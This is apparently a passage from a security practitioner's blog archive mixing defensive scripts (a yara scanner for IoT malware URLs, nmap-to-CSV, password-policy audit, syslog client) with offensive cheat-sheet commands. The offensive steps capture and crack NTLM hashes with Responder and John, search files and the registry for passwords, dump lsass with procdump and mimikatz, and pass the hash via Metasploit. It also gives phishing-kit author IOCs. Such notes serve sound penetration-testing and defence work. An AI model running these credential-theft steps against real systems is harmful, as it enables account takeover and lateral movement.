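    """File name derived from the url that cannot leave the working directory:
    every character outside [A-Za-z0-9._-] becomes '_' and leading dots are dropped."""
    name = re.sub(r"[^A-Za-z0-9._-]", "_", url.strip()).lstrip(".")
    return (name or "url")[:200] + ext


def wget_argv(url, out_name, timeout=2, tries=3):
    """Argument vector for wget with the same options as the post. Without a shell,
    spaces, quotes or ';' inside the url are ordinary characters of one argument;
    '--' stops wget from reading a url that starts with '-' as an option."""
    return ["wget", "--quiet", "--no-check-certificate",
            "--timeout=%d" % timeout, "--tries=%d" % tries,
            "--output-document=" + out_name, "--", url]


def yara_argv(rule_file, target, extra_params=()):
    """Argument vector for yara: rules file, then the file to scan."""
    return ["yara", *extra_params, rule_file, target]


def parse_yara_output(text):
    """yara prints one 'rule_name file_name' line per match; return (rule, file) pairs."""
    pairs = []
    for line in text.splitlines():
        rule, sep, target = line.partition(" ")
        if sep and rule:
            pairs.append((rule, target))
    return pairs


def run_argv(argv):
    """Run a command without a shell; returns (exit_code, stdout, stderr)."""
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.returncode, proc.stdout, proc.stderr


def download_and_scan(url, specific_rules, generic_rules):
    """Same decision flow as the post; returns a csv-style row such as
    ['NoResponse', file], ['NoMatch', file] or [rule_name, file]."""
    url = validate_url(url)
    out_name = safe_output_name(url)
    rc, _, err = run_argv(wget_argv(url, out_name))
    if rc != 0:
        return ["DownloadFailed", out_name, err.strip()]
    if os.path.getsize(out_name) == 0:
        return ["NoResponse", out_name]
    for rules in (specific_rules, generic_rules):
        rc, stdout, err = run_argv(yara_argv(rules, out_name))
        if rc != 0:
            return ["ScanError", out_name, err.strip()]
        matches = parse_yara_output(stdout)
        if matches:
            return [matches[0][0], out_name]
    return ["NoMatch", out_name]


if __name__ == "__main__":
    with open("urls.txt") as urls:
        for line in urls:
            if not line.strip():
                continue
            try:
                row = download_and_scan(line, "IoTSpecific.yar", "IoTGeneric.yar")
            except ValueError as exc:
                row = ["Rejected", line.strip(), str(exc)]
            print(",".join(row))
```

Rejected lines (non-http schemes, missing hosts) are reported rather than silently skipped, so a tampered urls.txt shows up in the output instead of becoming a shell command.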
Labels:
Internet of Things,
IoT,
Python,
wget,
yara
Thursday, October 31, 2019
Nmap Open Web Ports to CSV
nmap scan web ports (80,443,8080,8443) and output to csv using sed
nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 10.99.106.0/24 -oG - | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^\s]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open
example:
10.99.106.10,test1.local.com,open,closed,closed,closed
10.99.106.11,,open,open,closed,closed
10.99.106.12,,open,open,closed,closed
10.99.106.76,test2.local.com,closed,open,closed,closed
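The sed expression above depends on the four port entries appearing in a fixed order and on nothing unexpected (such as nmap's trailing "Ignored State:" note) being present on the line. As an added example that is not part of the original post, here is the same grepable-to-CSV conversion done with a small parser for nmap's -oG "Host:" lines; it looks each port up by number instead of by position, tolerates the "Ignored State" suffix, skips the comment and "Status: Up" lines the egrep removed, and keeps only hosts with at least one open port, as the final grep did. The sample scan text is constructed for this example; the function names are this example's own.

```python
import csv
import io
import re

WEB_PORTS = (80, 443, 8080, 8443)

# "Host: <ip> (<hostname>)<tab>Ports: <port>/<state>/<proto>/<owner>/<service>/<rpc>/<version>/, ..."
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Ports:\s+(.*)$")

# Constructed sample in nmap -oG layout (not real scan output); tabs separate the fields
SAMPLE_GNMAP = "\n".join([
    "# Nmap 7.80 scan initiated (constructed sample)",
    "Host: 10.99.106.10 (test1.local.com)\tStatus: Up",
    "Host: 10.99.106.10 (test1.local.com)\tPorts: 80/open/tcp//http///, 443/closed/tcp//https///, 8080/closed/tcp//http-proxy///, 8443/closed/tcp//https-alt///",
    "Host: 10.99.106.11 ()\tStatus: Up",
    "Host: 10.99.106.11 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///, 8080/closed/tcp//http-proxy///, 8443/closed/tcp//https-alt///",
    "Host: 10.99.106.50 ()\tPorts: 80/filtered/tcp//http///, 443/filtered/tcp//https///, 8080/filtered/tcp//http-proxy///, 8443/filtered/tcp//https-alt///\tIgnored State: filtered (0)",
    "# Nmap done -- 256 IP addresses (3 hosts up) scanned",
])


def parse_gnmap_line(line, ports=WEB_PORTS):
    """Return (ip, hostname, [state per requested port]) for a 'Ports:' line, else None."""
    m = HOST_RE.match(line.strip())
    if not m:
        return None
    ip, hostname, ports_field = m.groups()
    # drop the optional "\tIgnored State: ..." note nmap appends when it collapses many ports
    ports_field = ports_field.split("\t")[0]
    states = {}
    for entry in ports_field.split(","):
        parts = entry.strip().split("/")
        if len(parts) >= 2 and parts[0].isdigit():
            states[int(parts[0])] = parts[1]
    return ip, hostname, [states.get(p, "unknown") for p in ports]


def gnmap_to_csv(text, ports=WEB_PORTS, only_open=True):
    """CSV text with header ip,hostname,<port>... ; with only_open, hosts with no open port are dropped."""
    rows = []
    for line in text.splitlines():
        parsed = parse_gnmap_line(line, ports)
        if parsed is None:
            continue
        ip, hostname, states = parsed
        if only_open and "open" not in states:
            continue
        rows.append([ip, hostname] + states)
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["ip", "hostname"] + [str(p) for p in ports])
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    # real use: nmap ... -oG - | python3 this_script.py
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GNMAP
    print(gnmap_to_csv(data), end="")
```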
Tuesday, October 22, 2019
Sample Responder command
responder -I eth0 -r -b
cd /usr/share/responder/logs
john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt
Friday, October 18, 2019
Print all Mac Address Vendors around you (Arp -a)
# print all mac address vendors around you (using arp table and this great python library https://pypi.org/project/mac-vendor-lookup/ )
import os
from mac_vendor_lookup import MacLookup

lookup = MacLookup()  # one instance, so the vendor list is loaded once rather than per address
myCmd = os.popen("arp -a").read()
print(myCmd)
for line in myCmd.splitlines():
    for item in line.split():
        # Windows 'arp -a' prints MACs as 00-11-22-33-44-55; '--' skips the header separator lines
        if "-" in item and "--" not in item:
            try:
                print(item + ": " + lookup.lookup(item))
            except Exception:
                print(item + ": not found")
View Stored Credentials and Runas
>cmdkey /list
Currently stored credentials:
....
runas /savecred /user:XXXX "c:\BAD.exe"
Search inside Windows Files for passwords
>findstr /s password c:\*.ps1
Password Searching in Registry
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S
Get File Shares Exposed "net share"
>net share
Share name Resource Remark
-------------------------------------------------------------------------------
C$ C:\ Default share
IPC$ Remote IPC
print$ C:\WINDOWS\system32\spool\drivers Printer Drivers
ADMIN$ C:\WINDOWS Remote Admin
Password Login Settings "net accounts"
>net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 30
Minimum password length: 15
Length of password history maintained: 12
Lockout threshold: 3
Lockout duration (minutes): 45
Lockout observation window (minutes): 45
Computer role: WORKSTATION
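The "net accounts" output above is worth more than a glance: parsed into fields it can be checked against a baseline on every host. As an added example, not part of the original post, the block below parses that output and reports each setting that misses a baseline; the baseline numbers are this example's own assumptions, the sample text is constructed to mirror the values shown above, and the function names are this example's own.

```python
# Constructed sample output matching the fields shown in the post (not a real host's output)
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          30
Minimum password length:                              15
Length of password history maintained:                12
Lockout threshold:                                    3
Lockout duration (minutes):                           45
Lockout observation window (minutes):                 45
Computer role:                                        WORKSTATION
The command completed successfully.
"""

# Assumed baseline thresholds (this example's own choice, not from the post):
# ("min", n) means the value must be at least n; ("range", (lo, hi)) means lo <= value <= hi
BASELINE = {
    "Minimum password length": ("min", 14),
    "Length of password history maintained": ("min", 24),
    "Maximum password age (days)": ("range", (1, 365)),
    "Lockout threshold": ("range", (1, 10)),
    "Lockout duration (minutes)": ("min", 15),
}


def parse_net_accounts(text):
    """Turn the 'label: value' lines of 'net accounts' into a dict; lines without ':' are ignored."""
    settings = {}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        if sep:
            settings[label.strip()] = value.strip()
    return settings


def as_int(value):
    """Numeric settings become int; words such as 'Never' or 'Unlimited' become None."""
    return int(value) if value is not None and value.isdigit() else None


def audit_password_policy(settings, baseline=BASELINE):
    """Return one finding string per setting that misses the baseline."""
    findings = []
    for label, (kind, bound) in baseline.items():
        value = as_int(settings.get(label))
        if value is None:
            # 'Never' for the lockout threshold means accounts never lock out
            findings.append("%s: not set or non-numeric (%r)" % (label, settings.get(label)))
        elif kind == "min" and value < bound:
            findings.append("%s: %d is below the baseline minimum of %d" % (label, value, bound))
        elif kind == "range" and not (bound[0] <= value <= bound[1]):
            findings.append("%s: %d is outside the baseline range %d-%d" % (label, value, bound[0], bound[1]))
    return findings


if __name__ == "__main__":
    # real use: net accounts > accounts.txt, then feed the file in place of the sample
    for finding in audit_password_policy(parse_net_accounts(SAMPLE_NET_ACCOUNTS)):
        print(finding)
```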
Get File Shares Drive Letters wmic logicaldisk
>wmic logicaldisk get caption, description, providername
Caption Description ProviderName
C: Local Fixed Disk
X: Network Connection \\server\user\XXX
Y: Network Connection \\server\public
Print all environment variables "set"
>set
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\XXXX\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=PCNAME
ComSpec=C:\WINDOWS\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
Patches Installed wmic qfe
>wmic qfe
Caption CSName Description FixComments HotFixID InstallDate InstalledBy InstalledOn Name ServicePackInEffect Status
http://support.microsoft.com/?kbid=4514366 PCNAME Update KB4514366 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4515855 PCNAME Update KB4515855
http://support.microsoft.com/?kbid=4465065 PCNAME Update KB4465065 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4470788 PCNAME Security Update KB4470788 XX/XX/XXXX
http://support.microsoft.com/?kbid=4489907 PCNAME Security Update KB4489907 XX/XX/XXXX
http://support.microsoft.com/?kbid=4503308 PCNAME Security Update KB4503308 NT AUTHORITY\SYSTEM XX/XX/XXXX
Windows Systeminfo
>systeminfo | findstr /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 10
OS Version: 10.0.XXX N/A Build XXXX
BIOS Version: Dell Inc. 1.XX, XX/XX/XXX
Tuesday, October 15, 2019
Powershell listening on a port
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
    exit 1;
}
$socket.start();
# blocks until one client connects
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
try
{
    do
    {
        $read = $null;
        while($stream.DataAvailable -or $read -eq $null) {
            $read = $stream.Read($buffer, 0, 2048);
            if ($read -gt 0) {
                # decode only the bytes actually read so stale buffer contents are never echoed back
                $data = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $read).Trim([char]0).TrimEnd()
                $buffer.Clear()
                if($data -ne $null -and $data.Length -gt 0){
                    Write-Output ("RECEIVED : [{0}]" -f $data)
                    # echo the received text back to the client
                    $sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
                    $stream.Write($sendBack, 0, $sendBack.Length)
                    Write-Output ("SENT BACK: [{0}]" -f $data)
                }
            }
        }
    } While ($read -gt 0);
}
finally
{
    $stream.Dispose();
    $client.close();
    $socket.Stop();
}
Wednesday, October 2, 2019
Lsass Dump Mimikatz Pass the Hash Basics
procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp
Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords
Username : {user}
Domain : {domain}
NTLM : {NTLM Hash}
use auxiliary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run
good blog
https://blog.ropnop.com/practical-usage-of-ntlm-hashes/
Labels:
lsass,
Mimikatz,
Pass the hash,
Pass-the-hash,
procdump,
PTH,
SMB_login
When you can & cannot Pass the Hash
great blog
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
From a pentesting perspective:
- You CAN perform Pass-The-Hash attacks with NTLM hashes.
- You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.
Labels:
Mimikatz,
Pass the hash,
Pass-the-hash,
psexec,
PTH,
Responder,
SMB_login
Wednesday, September 25, 2019
find admin pages
Kali -> Applications -> 03 Web Application Analysis -> Web Vulnerability Scanners -> jSQL Injection -> Admin page -> Find admin page(s)
Thursday, May 16, 2019
Find Group Policy Passwords
simple windows command to find group policy passwords in xml
findstr /SI cpassword \\DC\sysvol\DOMAIN\Policies\*.xml
e.g. Groups.xml contains cpassword
Labels:
cpassword,
gpo,
group policy,
groups.xml,
password
Friday, May 10, 2019
New PhishingKitTracker Blog
Just a heads up I'm moving all my PhishingKitTracker blog posts ( @PhishKitTracker - https://github.com/neonprimetime/PhishingKitTracker ) over to this new blog url
https://phishingkittracker.blogspot.com/
This blog ( @neonprimetime ) will continue to be for #malware and other #infosec topics
Tuesday, May 7, 2019
IzLaden - Phishing Kit Author
#izladen #phishingkit author #threatactoremail izladen-Free-Tools@hotmail.com
---- | ★ ★ ★ IzlAden BenGazi FREE TOOLS ★ ★ ★ | ----
|----------| IzlAden BenGazi V3 TEXT RESULT |--------------|
Coded By IzlAden BenGazi ===> 2016 / 2017
227ce240dff32a0a35810b0040539ae2 https://www.virustotal.com/#/file/735a16f31af8159af71c40738a22c5638d41bd58144014b9a3fee00390a1da6b/details
a9fd8300c7a5654f1ee9247ebdb3e42a https://www.virustotal.com/#/file/7434db52972fd2aa7f253bded2efff92f6069fd9e8ff7beb27c5d998ce803c41/detection
c37d8e468a67748c7f9687ecfe39c960 https://www.virustotal.com/#/file/4e1ce76c96c3163d1da5060157b4c0924647e4938843f827f36380837bb7610e/detection
FudPages - Phishing Kit Author
#fudpages #phishingkit author #threatactoremail fudpages@gmail.com
---------------Created BY fudpages(doit)com-------------
---------------Created BY fudpages-------------
----------- FUDPAGES [.] RU --------------
abc845784335374ecb86cc7d9f105ba7 https://www.virustotal.com/#/file/3e76cff314a6b4fef91784f8fab3f21e985f68bd9aa909cdca0245611a3f8757/detection
070a0ebacac551e86ed00e1118f9a969 https://www.virustotal.com/#/file/bcb77cbee636b93320b7f2bcd302e57f32bdc3a8ad34beb95c5e74a3a6d3dc63/detection
69b3f69e5a2b02338fe6577c62d7bf2e https://www.virustotal.com/#/file/c40dc9c4da50c7bbe85c0c88cc2ee2b98ff44104d1bea87ad01fceb1e485b6cc/detection
Labels:
Fud Pages,
FudPages,
FUDPAGES [.] RU,
fudpages(doit)com,
fudpages@gmail.com,
Phishing,
Phishing Kit
Blackshop Tools - Phishing Kit Author
#BlackshopTools #phishingkit author #threatactoremail blackshop.tools@gmail.com
skype blackshop tools ICQ 657940639 sell all Spamming & Hacking tools
---------------Created By blackshop.tools------------------------------
3b2d31dcd6e2e22af611856644d26e21 https://www.virustotal.com/#/file/fa8cf9cb97931eabd0f10cf3dbe8d8820ffa254df7239ce988d6daba4f91cbe3/detection
b9b61c8c84c51c292f4800afef8f56d1 https://www.virustotal.com/#/file/463819bd958981039ed47b6cd7efadb516837f19178bb284c0b5124f6cfb572d/detection
dc95ec1097920f11590d8aa9ecea50e6 https://www.virustotal.com/#/file/bf4c4aa938d795d011c5e68261f1edc5a79b2c710175b1bb71426ef12910de27/detection
2749a88067675d74bbf01b7776332082 https://www.virustotal.com/#/file/30e67f21d143ddae4af315daca8745ab7fcf2f08fa73326f42b620728e375de1/detection
0e489a50c0be2b93940f835bb6301736 https://www.virustotal.com/#/file/a5f191da51b09b982412490a1f4bfbe64a491a70c90c3fc4f3f3ee4b51abb697/detection
39ddb4f240c0e837b738f5d7f26ea5b1 https://www.virustotal.com/#/file/da51cb87c17a80201738c76fd51d725ebd5d2035230e9be97615bc9003fbad98/detection
CAZANOVA163 - Phishing Kit Author
#CAZANOVA163 #phishingkit author #threatactoremail
CAZANOVA163-Tools@hotmail.com
CAZANOVA163-Free-Tools@hotmail.com
a357bcfb2779420c95b5a4a2700ab30a https://www.virustotal.com/#/file/5e7c567e561a59f93db854ac91cd7f933fa1dac2622e9a05906964c9e03935fb/details
63f73f4bc9fc243cb919708286c700d8 https://www.virustotal.com/#/file/06be80d28dd6a0cf906b0e7a24054dce23f0a62c982a1eacb83ffbe7073f8dba/details
$headers = "From: CAZANOVA163 <CAZANOVA163-Tools@hotmail.com>\r\n";
$headers = "From: CAZANOVA163 <CAZANOVA163-Free-Tools@hotmail.com>\r\n";
<meta name="description" content="xPayPal_2017 v1.1 | Coded By CaZaNoVa163">
<meta name="author" content="CaZaNoVa163">
Labels:
CAZANOVA163,
CAZANOVA163-Free-Tools@hotmail.com,
CAZANOVA163-Tools@hotmail.com,
Phishing,
Phishing Kit
Anonisma - Phishing Kit Author
#threatactoremail #phishing #phishingkit Anonisma-Free-Tools@hotmail.com
https://www.virustotal.com/#/file/801806d0cdedfd1ab66ef5b11499df78dcff82c642704bd9d9748c62ccc676d6/detection
https://www.virustotal.com/#/file/3c590a371b79c940d76a3c3a24ccda3a93334ba618d2d2473e61053da349a072/detection
https://www.virustotal.com/#/file/a4d0f7d275d0b04b8b3ff80a58a24991dfd9800d3972027a8dbde6582cb185f5/detection
// Coded By Anonisma ===> 2016 / 2017
include "./includes/lang".$_SESSION['ANONISMA-AYOUB'];
---- | ★ ★ ★ ANONISMA FREE TOOLS ★ ★ ★ | ----
$headers = "From: ANONISMA SMART <Anonisma-Free-Tools@hotmail.com>\r\n";
$text_result_anon .= "|----------| ANONISMA MA DZ TN V3 TEXT RESULT |--------------|\n";
$_SESSION['ANONISMA-AYOUB']="/fr.php";
$_SESSION['ANONISMA-AYOUB']="/es.php";
$_SESSION['ANONISMA-AYOUB']="/it.php";
$_SESSION['ANONISMA-AYOUB']="/ru.php";
$_SESSION['ANONISMA-AYOUB']="/pt.php";
$_SESSION['ANONISMA-AYOUB']="/tr.php";
$_SESSION['ANONISMA-AYOUB']="/pl.php";
$_SESSION['ANONISMA-AYOUB']="/no.php";
$_SESSION['ANONISMA-AYOUB']="/nl.php";
$_SESSION['ANONISMA-AYOUB']="/de.php";
$_SESSION['ANONISMA-AYOUB']="/en.php";
Labels:
Anonisma,
Anonisma Free Tools,
Anonisma-Free-Tools@hotmail.com,
Coded By Anonisma,
Phishing,
Phishing Kit
Friday, May 3, 2019
Wireshark Fix for Error No Protocol Specified
Working through a pen testing lab, I was getting access denied when trying to capture.
Tried running sudo and it doesn't let you because it's a security risk.
But when we're in a pen test lab, I'm ok with that risk.
But I was still getting this error "no protocol specified"
> sudo wireshark
No protocol specified
No protocol specified
(wireshark:3962): Gtk-WARNING **: cannot open display: :0.0
The fix I found
> export XAUTHORITY=/home/mooreted/.Xauthority
> sudo wireshark
Labels:
.Xauthority,
error,
no protocol specified,
Wireshark,
XAuthority
Wednesday, May 1, 2019
Registry Explorer basic usage
Open up a registry hive such as
c:\windows\system32\config\SOFTWARE
with Registry Explorer from Eric Zimmerman
https://ericzimmerman.github.io/#!index.md
to view registry contents
Labels:
eric zimmerman,
hive,
regcmd,
Registry,
registryexplorer
Date Time Conversions with DCode
If you have a date/time in numerical format such as in the registry
SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate
1510798682
Use the software DCode with the format: "Unix:Numeric Value" to get the actual date 11/16/2017
https://www.digital-detective.net/dcode/
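When DCode is not at hand, the same conversion is a few lines of Python. The block below is an added example, not part of the original post: it decodes the "Unix:Numeric Value" format used for InstallDate above and, going one step beyond the post, the Windows FILETIME format (100-nanosecond intervals since 1601-01-01) that many other registry and NTFS timestamps use. The function names and the digit-count heuristic in decode_registry_number are this example's own assumptions.

```python
from datetime import datetime, timedelta, timezone

# Seconds between the FILETIME epoch (1601-01-01) and the Unix epoch (1970-01-01)
EPOCH_DIFF_SECONDS = 11644473600
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def unix_to_utc(value):
    """DCode's 'Unix:Numeric Value': whole seconds since 1970-01-01 UTC."""
    return datetime.fromtimestamp(int(value), tz=timezone.utc)


def filetime_to_utc(value):
    """Windows FILETIME: 100-nanosecond intervals since 1601-01-01 UTC.
    Integer division by 10 keeps microsecond precision, which datetime can represent."""
    return FILETIME_EPOCH + timedelta(microseconds=int(value) // 10)


def unix_to_filetime(value):
    """Inverse conversion, useful for building search values for a known date."""
    return (int(value) + EPOCH_DIFF_SECONDS) * 10_000_000


def decode_registry_number(value):
    """Guess the format of a numeric registry timestamp (assumption: 10-digit values are
    Unix seconds, 17-18 digit values are FILETIME) and return (format_name, datetime)."""
    v = int(value)
    if v >= 10**16:
        return ("Windows:FILETIME", filetime_to_utc(v))
    return ("Unix:Numeric Value", unix_to_utc(v))


if __name__ == "__main__":
    # the InstallDate value from the post
    fmt, when = decode_registry_number("1510798682")
    print(fmt, when.strftime("%m/%d/%Y %H:%M:%S UTC"))
```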
Thursday, March 14, 2019
python syslog script
Useful Python syslog client I found online
https://github.com/cloudpassage/splunk-halo-python/blob/master/remote_syslog.py
sample usage
syslog('Apr 23 07:36:52 10.2.108.181 EventName=[], SourceIP=[], SourcePort=[], DestinationIP=[], DestinationPort=[], UserName=[], SourceWorkstation=[], Url=[], FilePath=[], MD5=[], LogSource=[], MacAddress=[], LogSourceTime=[], Notes=[]', host='10.xx.xx.xx', facility=FACILITY['local0'], level=LEVEL['info'])
---------------
#!/usr/bin/python
"""
Python syslog client.
This code is placed in the public domain by the author.
Written by Christian Stigen Larsen.
This is especially neat for Windows users, who (I think) don't
get any syslog module in the default python installation.
See RFC3164 for more info -- http://tools.ietf.org/html/rfc3164
Note that if you intend to send messages to remote servers, their
syslogd must be started with -r to allow to receive UDP from
the network.
"""
import socket

# I'm a python novice, so I don't know of better ways to define enums
FACILITY = {
    'kern': 0, 'user': 1, 'mail': 2, 'daemon': 3,
    'auth': 4, 'syslog': 5, 'lpr': 6, 'news': 7,
    'uucp': 8, 'cron': 9, 'authpriv': 10, 'ftp': 11,
    'local0': 16, 'local1': 17, 'local2': 18, 'local3': 19,
    'local4': 20, 'local5': 21, 'local6': 22, 'local7': 23,
}
LEVEL = {
    'emerg': 0, 'alert': 1, 'crit': 2, 'err': 3,
    'warning': 4, 'notice': 5, 'info': 6, 'debug': 7
}


def syslog(message, level=LEVEL['notice'], facility=FACILITY['daemon'],
           host='localhost', port=514):
    """
    Send syslog UDP packet to given host and port.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # RFC3164 PRI field: facility * 8 + severity, wrapped in angle brackets
    data = '<%d>%s' % (level + facility * 8, message)
    # sendto() needs bytes on Python 3 (on Python 2 the encode is a no-op for str)
    sock.sendto(data.encode('utf-8'), (host, port))
    sock.close()
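As an added example (my code, not the post's or the linked script's), here is the reverse of that PRI arithmetic: a decoder that splits a received datagram back into facility, severity and message, plus a loopback round-trip that shows what a collector actually receives on the wire. The function names and the constructed sample line are mine.

```python
import re
import socket

# Reverse lookups for the FACILITY / LEVEL tables above (RFC3164 section 4.1.1).
FACILITY_NAMES = {0: 'kern', 1: 'user', 2: 'mail', 3: 'daemon', 4: 'auth',
                  5: 'syslog', 6: 'lpr', 7: 'news', 8: 'uucp', 9: 'cron',
                  10: 'authpriv', 11: 'ftp', 16: 'local0', 17: 'local1',
                  18: 'local2', 19: 'local3', 20: 'local4', 21: 'local5',
                  22: 'local6', 23: 'local7'}
LEVEL_NAMES = ['emerg', 'alert', 'crit', 'err', 'warning', 'notice', 'info', 'debug']
PRI_RE = re.compile(br'^<(\d{1,3})>(.*)$', re.DOTALL)


def encode_pri(facility, level):
    """PRI = facility * 8 + severity, the same arithmetic the client above uses."""
    if not (0 <= facility <= 23 and 0 <= level <= 7):
        raise ValueError('facility must be 0-23 and level 0-7')
    return facility * 8 + level


def decode_pri(packet):
    """Split a raw '<PRI>message' datagram into (facility, level, message)."""
    m = PRI_RE.match(packet)
    if m is None:
        raise ValueError('missing <PRI> header')
    pri = int(m.group(1))
    if pri > 191:  # 23 * 8 + 7 is the largest legal PRI
        raise ValueError('PRI %d out of range' % pri)
    return pri // 8, pri % 8, m.group(2).decode('utf-8', 'replace')


def loopback_roundtrip(message, facility=16, level=6):
    """Send one datagram to a listener on 127.0.0.1 and return what it decodes to."""
    rx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    rx.bind(('127.0.0.1', 0))  # ephemeral port, so no root needed for 514
    rx.settimeout(2)
    tx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        data = ('<%d>%s' % (encode_pri(facility, level), message)).encode('utf-8')
        tx.sendto(data, rx.getsockname())
        packet, _ = rx.recvfrom(2048)
    finally:
        tx.close()
        rx.close()
    fac, lvl, text = decode_pri(packet)
    return FACILITY_NAMES.get(fac, str(fac)), LEVEL_NAMES[lvl], text


if __name__ == '__main__':
    # Constructed sample line in the same shape as the post's usage example.
    print(loopback_roundtrip('Apr 23 07:36:52 10.2.108.181 EventName=[test]'))
```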